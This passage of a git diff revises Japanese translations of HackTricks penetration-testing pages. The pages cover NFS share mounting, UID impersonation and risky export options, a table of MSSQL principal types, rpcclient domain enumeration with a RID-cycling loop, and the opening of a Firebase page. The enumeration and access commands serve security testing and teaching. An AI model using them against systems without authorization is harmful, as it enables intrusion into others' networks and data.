-o nolock
```
-あなたは**バージョン2を使用するように指定すべきです**。なぜなら、**認証**や**認可**が**一切ない**からです。
+**バージョン2を使用する**ことを指定する必要があります。なぜなら、それには**認証**や**承認**が**ない**からです。
**例:**
```bash
mkdir /mnt/new_back
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
```
-## 権限
+## Permissions
-特定のユーザー(UIDによってのみアクセス可能なファイルまたはフォルダーを含む)が含まれているフォルダーをマウントした場合、そのUIDを持つ**ユーザー**を**ローカル**で作成し、その**ユーザー**を使用してファイル/フォルダーに**アクセス**できます。
+特定のユーザー(**UID**)のみがアクセスできる**ファイルやフォルダ**を含むフォルダをマウントすると、**ローカル**にその**UID**を持つユーザーを作成し、その**ユーザー**を使用することでファイル/フォルダに**アクセス**できるようになります。
## NSFShell
-簡単にリスト、マウントし、UIDとGIDを変更してファイルにアクセスするために[nfsshell](https://github.com/NetDirect/nfsshell)を使用できます。
+ファイルにアクセスするために、UIDとGIDを簡単にリスト、マウント、変更するには、[nfsshell](https://github.com/NetDirect/nfsshell)を使用できます。
-[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/)
+[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/)
-## 設定ファイル
+## Config files
```
/etc/exports
/etc/lib/nfs/etab
```
### 危険な設定
-- **読み書き権限 (`rw`):** この設定はファイルシステムへの読み取りと書き込みの両方を許可します。このような広範なアクセスを許可する影響を慎重に考慮することが重要です。
+- **読み書き権限 (`rw`):** この設定は、ファイルシステムからの読み取りと書き込みの両方を許可します。このような広範なアクセスを付与することの影響を考慮することが重要です。
-- **安全でないポートの使用 (`insecure`):** 有効にすると、システムは1024を超えるポートを利用できます。この範囲を超えるポートのセキュリティは厳格でない可能性があり、リスクが高まります。
+- **安全でないポートの使用 (`insecure`):** 有効にすると、システムは1024以上のポートを利用できるようになります。この範囲を超えるポートのセキュリティは厳格でない場合があり、リスクが増加します。
-- **ネストされたファイルシステムの可視性 (`nohide`):** この設定により、他のファイルシステムがエクスポートされたディレクトリの下にマウントされていてもディレクトリが表示されます。各ディレクトリには適切な管理のために独自のエクスポートエントリが必要です。
+- **ネストされたファイルシステムの可視性 (`nohide`):** この設定により、別のファイルシステムがエクスポートされたディレクトリの下にマウントされていても、ディレクトリが可視化されます。各ディレクトリには適切な管理のために独自のエクスポートエントリが必要です。
-- **ルートファイルの所有権 (`no_root_squash`):** この設定では、ルートユーザーによって作成されたファイルは元のUID/GID 0を維持し、最小特権の原則を無視し、過剰な権限を付与する可能性があります。
+- **ルートファイルの所有権 (`no_root_squash`):** この設定では、ルートユーザーによって作成されたファイルは元のUID/GID 0を維持し、最小権限の原則を無視し、過剰な権限を付与する可能性があります。
-- **すべてのユーザーのスクワッシュ解除 (`no_all_squash`):** このオプションは、ユーザーのアイデンティティがシステム全体で保持されることを確認し、適切に処理されない場合には権限とアクセス制御の問題が発生する可能性があります。
+- **すべてのユーザーの非スクワッシュ (`no_all_squash`):** このオプションは、ユーザーのアイデンティティがシステム全体で保持されることを保証しますが、正しく処理されない場合、権限やアクセス制御の問題を引き起こす可能性があります。
-## NFSミスコンフィギュレーションを利用した特権昇格
+## NFSの誤設定を利用した特権昇格
-[NFS no\_root\_squashおよびno\_all\_squash特権昇格](../linux-hardening/privilege-escalation/nfs-no\_root_squash-misconfiguration-pe.md)
+[NFS no\_root\_squash と no\_all\_squash の特権昇格](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md)
-## HackTricks自動コマンド
+## HackTricks 自動コマンド
```
Protocol_Name: NFS #Protocol Abbreviation if there is one.
Port_Number: 2049 #Comma separated if there is more than one.
@@ -121,14 +124,17 @@ Name: Nmap
Description: Nmap with NFS Scripts
Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP}
```
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションです。
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう。
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、または**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
index ab7f7c088..bad95bc41 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
@@ -1,45 +1,51 @@
# MSSQLユーザーの種類
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を入手
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングテクニックを共有してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
-[**ドキュメント**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16)からの表。
+表は[**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16)から取得しました。
-| 列名 | データ型 | 説明 |
+| 列名 | データ型 | 説明 |
| ---------------------------------------- | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| **name** | **sysname** | データベース内で一意のプリンシパルの名前。 |
-| **principal\_id** | **int** | データベース内で一意のプリンシパルのID。 |
-| **type** | **char(1)** | プリンシパルの種類:
A = アプリケーションロール
C = 証明書にマップされたユーザー
E = Azure Active Directoryからの外部ユーザー
G = Windowsグループ
K = 非対称キーにマップされたユーザー
R = データベースロール
S = SQLユーザー
U = Windowsユーザー
X = Azure Active Directoryグループまたはアプリケーションからの外部グループ
|
-| **type\_desc** | **nvarchar(60)** | プリンシパルの種類の説明。
APPLICATION_ROLE
CERTIFICATE_MAPPED_USER
EXTERNAL_USER
WINDOWS_GROUP
ASYMMETRIC_KEY_MAPPED_USER
DATABASE_ROLE
SQL_USER
WINDOWS_USER
EXTERNAL_GROUPS
|
-| **default\_schema\_name** | **sysname** | SQL名がスキーマを指定しない場合に使用される名前。S、U、またはAタイプのプリンシパルの場合はNULL。 |
+| **name** | **sysname** | プリンシパルの名前、データベース内で一意。 |
+| **principal\_id** | **int** | プリンシパルのID、データベース内で一意。 |
+| **type** | **char(1)** | プリンシパルのタイプ:
A = アプリケーションロール
C = 証明書にマッピングされたユーザー
E = Azure Active Directoryからの外部ユーザー
G = Windowsグループ
K = 非対称キーにマッピングされたユーザー
R = データベースロール
S = SQLユーザー
U = Windowsユーザー
X = Azure Active Directoryグループまたはアプリケーションからの外部グループ
|
+| **type\_desc** | **nvarchar(60)** | プリンシパルタイプの説明。
APPLICATION_ROLE
CERTIFICATE_MAPPED_USER
EXTERNAL_USER
WINDOWS_GROUP
ASYMMETRIC_KEY_MAPPED_USER
DATABASE_ROLE
SQL_USER
WINDOWS_USER
EXTERNAL_GROUPS
|
+| **default\_schema\_name** | **sysname** | SQL名がスキーマを指定しない場合に使用される名前。S、U、またはAタイプのプリンシパルにはNULL。 |
| **create\_date** | **datetime** | プリンシパルが作成された時刻。 |
| **modify\_date** | **datetime** | プリンシパルが最後に変更された時刻。 |
-| **owning\_principal\_id** | **int** | このプリンシパルを所有するプリンシパルのID。すべての固定データベースロールはデフォルトで**dbo**によって所有されています。 |
-| **sid** | **varbinary(85)** | プリンシパルのSID(セキュリティ識別子)。SYSおよびINFORMATION SCHEMASの場合はNULL。 |
-| **is\_fixed\_role** | **bit** | 1の場合、この行は次の固定データベースロールのエントリを表します:db\_owner、db\_accessadmin、db\_datareader、db\_datawriter、db\_ddladmin、db\_securityadmin、db\_backupoperator、db\_denydatareader、db\_denydatawriter。 |
-| **authentication\_type** | **int** | 適用対象: SQL Server 2012(11.x)以降。
認証タイプを示します。次の値とその説明が可能です。
0 : 認証なし
1 : インスタンス認証
2 : データベース認証
3 : Windows認証
4 : Azure Active Directory認証
|
-| **authentication\_type\_desc** | **nvarchar(60)** | 適用対象: SQL Server 2012(11.x)以降。
認証タイプの説明。次の値とその説明が可能です。
NONE
: 認証なし
INSTANCE
: インスタンス認証
DATABASE
: データベース認証
WINDOWS
: Windows認証
EXTERNAL
: Azure Active Directory認証
|
-| **default\_language\_name** | **sysname** | 適用対象: SQL Server 2012(11.x)以降。
このプリンシパルのデフォルト言語を示します。
|
-| **default\_language\_lcid** | **int** | 適用対象: SQL Server 2012(11.x)以降。
このプリンシパルのデフォルトLCIDを示します。
|
-| **allow\_encrypted\_value\_modifications** | **bit** | 適用対象: SQL Server 2016(13.x)以降、SQL Database。
サーバーでのバルクコピー操作における暗号化メタデータチェックを抑制します。これにより、ユーザーはデータを復号化せずに、Always Encryptedを使用して暗号化されたデータをテーブルやデータベース間でバルクコピーできます。デフォルトはOFFです。
|
+| **owning\_principal\_id** | **int** | このプリンシパルを所有するプリンシパルのID。すべての固定データベースロールはデフォルトで**dbo**によって所有される。 |
+| **sid** | **varbinary(85)** | プリンシパルのSID(セキュリティ識別子)。SYSおよびINFORMATION SCHEMASにはNULL。 |
+| **is\_fixed\_role** | **bit** | 1の場合、この行は固定データベースロールの1つのエントリを表す:db\_owner、db\_accessadmin、db\_datareader、db\_datawriter、db\_ddladmin、db\_securityadmin、db\_backupoperator、db\_denydatareader、db\_denydatawriter。 |
+| **authentication\_type** | **int** | 適用対象: SQL Server 2012 (11.x)以降。
認証タイプを示す。以下は可能な値とその説明。
0 : 認証なし
1 : インスタンス認証
2 : データベース認証
3 : Windows認証
4 : Azure Active Directory認証
|
+| **authentication\_type\_desc** | **nvarchar(60)** | 適用対象: SQL Server 2012 (11.x)以降。
認証タイプの説明。以下は可能な値とその説明。
NONE
: 認証なし
INSTANCE
: インスタンス認証
DATABASE
: データベース認証
WINDOWS
: Windows認証
EXTERNAL
: Azure Active Directory認証
|
+| **default\_language\_name** | **sysname** | 適用対象: SQL Server 2012 (11.x)以降。
このプリンシパルのデフォルト言語を示す。
|
+| **default\_language\_lcid** | **int** | 適用対象: SQL Server 2012 (11.x)以降。
このプリンシパルのデフォルトLCIDを示す。
|
+| **allow\_encrypted\_value\_modifications** | **bit** | 適用対象: SQL Server 2016 (13.x)以降、SQL Database。
サーバーでの暗号化メタデータチェックを抑制し、Always Encryptedを使用して暗号化されたデータをテーブルまたはデータベース間で復号化せずにバルクコピーできるようにします。デフォルトはOFFです。
|
+
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を入手
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングテクニックを共有してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
index b3443b368..ccaad6305 100644
--- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
+++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
@@ -1,16 +1,19 @@
# rpcclient enumeration
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れます
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
**Try Hard Security Group**
@@ -20,31 +23,31 @@
***
-### 相対識別子(RID)とセキュリティ識別子(SID)の概要
+### Relative Identifiers (RID) と Security Identifiers (SID) の概要
-**相対識別子(RID)**と**セキュリティ識別子(SID)**は、Windowsオペレーティングシステムにおいて、ネットワークドメイン内のユーザーやグループなどのオブジェクトを一意に識別および管理するための重要なコンポーネントです。
+**Relative Identifiers (RID)** と **Security Identifiers (SID)** は、ネットワークドメイン内のオブジェクト(ユーザーやグループなど)を一意に識別し管理するためのWindowsオペレーティングシステムの重要なコンポーネントです。
-- **SIDs**は、各ドメインが区別可能であることを保証するための一意の識別子として機能します。
-- **RIDs**は、これらのドメイン内のオブジェクトのための一意の識別子を作成するためにSIDsに追加されます。この組み合わせにより、オブジェクトの権限とアクセス制御を正確に追跡および管理することが可能となります。
+- **SID** はドメインの一意の識別子として機能し、各ドメインが区別できるようにします。
+- **RID** はSIDに追加され、これらのドメイン内のオブジェクトの一意の識別子を作成します。この組み合わせにより、オブジェクトの権限とアクセス制御の正確な追跡と管理が可能になります。
-たとえば、ユーザー名が`pepe`の場合、そのユニークな識別子は、ドメインのSIDと彼の特定のRIDを組み合わせたもので、16進数(`0x457`)および10進数(`1111`)の形式で表されます。これにより、pepeのドメイン内での完全かつ一意の識別子が次のように生成されます:`S-1-5-21-1074507654-1937615267-42093643874-1111`。
+例えば、`pepe`という名前のユーザーは、ドメインのSIDと特定のRIDを組み合わせた一意の識別子を持つことがあります。これは16進数(`0x457`)および10進数(`1111`)形式で表されます。これにより、ドメイン内のpepeの完全かつ一意の識別子は次のようになります: `S-1-5-21-1074507654-1937615267-42093643874-1111`。
-### **rpcclientを使用した列挙**
+### **rpcclientによる列挙**
-Sambaの**`rpcclient`**ユーティリティは、**名前付きパイプを介してRPCエンドポイント**とやり取りするために使用されます。**SMBセッションが確立された後**に、しばしば資格情報が必要となります。
+Sambaの**`rpcclient`**ユーティリティは、**名前付きパイプを介してRPCエンドポイントと対話するために使用されます**。以下のコマンドは、**SMBセッションが確立された後にSAMR、LSARPC、およびLSARPC-DSインターフェースに対して発行できます**。通常、資格情報が必要です。
#### サーバー情報
-* **サーバー情報を取得**するには:`srvinfo`コマンドを使用します。
+* **サーバー情報を取得するには**: `srvinfo` コマンドを使用します。
#### ユーザーの列挙
-* **ユーザーをリストアップ**するには:`querydispinfo`および`enumdomusers`を使用します。
-* **ユーザーの詳細**は:`queryuser <0xrid>`で取得します。
-* **ユーザーのグループ**は:`queryusergroups <0xrid>`で取得します。
-* **ユーザーのSIDは**:`lookupnames `を使用して取得します。
-* **ユーザーのエイリアス**は:`queryuseraliases [builtin|domain] `で取得します。
+* **ユーザーをリストするには**: `querydispinfo` と `enumdomusers` を使用します。
+* **ユーザーの詳細を取得するには**: `queryuser <0xrid>` を使用します。
+* **ユーザーのグループを取得するには**: `queryusergroups <0xrid>` を使用します。
+* **ユーザーのSIDを取得するには**: `lookupnames ` を使用します。
+* **ユーザーのエイリアスを取得するには**: `queryuseraliases [builtin|domain] ` を使用します。
```bash
# Users' RIDs-forced
for i in $(seq 500 1100); do
@@ -55,51 +58,51 @@ done
```
#### グループの列挙
-* **グループ**:`enumdomgroups`による。
-* **グループの詳細**:`querygroup <0xrid>`を使用。
-* **グループのメンバー**:`querygroupmem <0xrid>`を介して。
+* **グループ**は: `enumdomgroups`で。
+* **グループの詳細**は: `querygroup <0xrid>`で。
+* **グループのメンバー**は: `querygroupmem <0xrid>`で。
#### エイリアスグループの列挙
-* **エイリアスグループ**:`enumalsgroups `による。
-* **エイリアスグループのメンバー**:`queryaliasmem builtin|domain <0xrid>`を使用。
+* **エイリアスグループ**は: `enumalsgroups `で。
+* **エイリアスグループのメンバー**は: `queryaliasmem builtin|domain <0xrid>`で。
#### ドメインの列挙
-* **ドメイン**:`enumdomains`を使用。
-* **ドメインのSIDの取得**:`lsaquery`による。
-* **ドメイン情報の取得**:`querydominfo`による。
+* **ドメイン**は: `enumdomains`を使用。
+* **ドメインのSIDは取得される**: `lsaquery`を通じて。
+* **ドメイン情報は取得される**: `querydominfo`で。
-#### 共有の列挙
+#### シェアの列挙
-* **利用可能なすべての共有**:`netshareenumall`による。
-* **特定の共有に関する情報の取得**:`netsharegetinfo `を使用。
+* **すべての利用可能なシェア**は: `netshareenumall`で。
+* **特定のシェアに関する情報は取得される**: `netsharegetinfo `で。
-#### SIDを使用した追加操作
+#### SIDに関する追加操作
-* **名前からSIDへの変換**:`lookupnames `を使用。
-* **さらなるSID**:`lsaenumsid`を介して。
-* **RIDサイクリングによるさらなるSIDの確認**:`lookupsids `によって実行される。
+* **名前によるSID**は: `lookupnames `を使用。
+* **さらに多くのSID**は: `lsaenumsid`で。
+* **より多くのSIDを確認するためのRIDサイクリング**は: `lookupsids `で行われる。
#### **追加コマンド**
| **コマンド** | **インターフェース** | **説明** |
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
-| queryuser | SAMR | ユーザー情報の取得 |
-| querygroup | グループ情報の取得 | |
-| querydominfo | ドメイン情報の取得 | |
-| enumdomusers | ドメインユーザーの列挙 | |
-| enumdomgroups | ドメイングループの列挙 | |
-| createdomuser | ドメインユーザーの作成 | |
-| deletedomuser | ドメインユーザーの削除 | |
-| lookupnames | LSARPC | ユーザー名をSID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8)値に変換する |
-| lookupsids | SIDをユーザー名に変換する(RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9)サイクリング) | |
-| lsaaddacctrights | ユーザーアカウントに権限を追加する | |
-| lsaremoveacctrights | ユーザーアカウントから権限を削除する | |
-| dsroledominfo | LSARPC-DS | プライマリドメイン情報の取得 |
-| dsenumdomtrusts | ADフォレスト内の信頼されたドメインの列挙 | |
+| queryuser | SAMR | ユーザー情報を取得 |
+| querygroup | グループ情報を取得 | |
+| querydominfo | ドメイン情報を取得 | |
+| enumdomusers | ドメインユーザーを列挙 | |
+| enumdomgroups | ドメイングループを列挙 | |
+| createdomuser | ドメインユーザーを作成 | |
+| deletedomuser | ドメインユーザーを削除 | |
+| lookupnames | LSARPC | ユーザー名をSID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8)値に照会 |
+| lookupsids | SIDをユーザー名に照会 (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9)サイクリング) | |
+| lsaaddacctrights | ユーザーアカウントに権利を追加 | |
+| lsaremoveacctrights | ユーザーアカウントから権利を削除 | |
+| dsroledominfo | LSARPC-DS | プライマリドメイン情報を取得 |
+| dsenumdomtrusts | ADフォレスト内の信頼されたドメインを列挙 | |
-**_samrdump_** **および** **_rpcdump_** の動作を理解するには、[**Pentesting MSRPC**](../135-pentesting-msrpc.md)を読むことをお勧めします。
+ツール _**samrdump**_ **と** _**rpcdump**_ の動作をよりよく理解するためには、[**Pentesting MSRPC**](../135-pentesting-msrpc.md)を読むべきです。
**Try Hard Security Group**
@@ -107,14 +110,17 @@ done
{% embed url="https://discord.gg/tryhardsecurity" %}
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-htARTE(HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学びましょう!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか、またはHackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
-* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
-* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **ハッキングのトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
+{% endhint %}
diff --git a/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/network-services-pentesting/pentesting-web/buckets/firebase-database.md
index 84df138e4..49e70ef86 100644
--- a/network-services-pentesting/pentesting-web/buckets/firebase-database.md
+++ b/network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -1,33 +1,39 @@
# Firebase Database
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけます
-* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れます
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**してください 🐦[@carlospolopm](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
-## Firebaseとは
+## What is Firebase
-Firebaseは、主にモバイルアプリケーション向けのBackend-as-a-Servicesです。バックエンドのプログラミングの負担を取り除くことに焦点を当て、素敵なSDKやアプリケーションとバックエンドのやり取りを容易にする多くの興味深い機能を提供しています。
+Firebaseは主にモバイルアプリケーション向けのBackend-as-a-Serviceです。バックエンドのプログラミングの負担を軽減し、アプリケーションとバックエンドの相互作用を容易にする素晴らしいSDKやその他の興味深い機能を提供することに重点を置いています。
-Firebaseについて詳しくは以下を参照してください:
+Firebaseの詳細については、こちらをご覧ください:
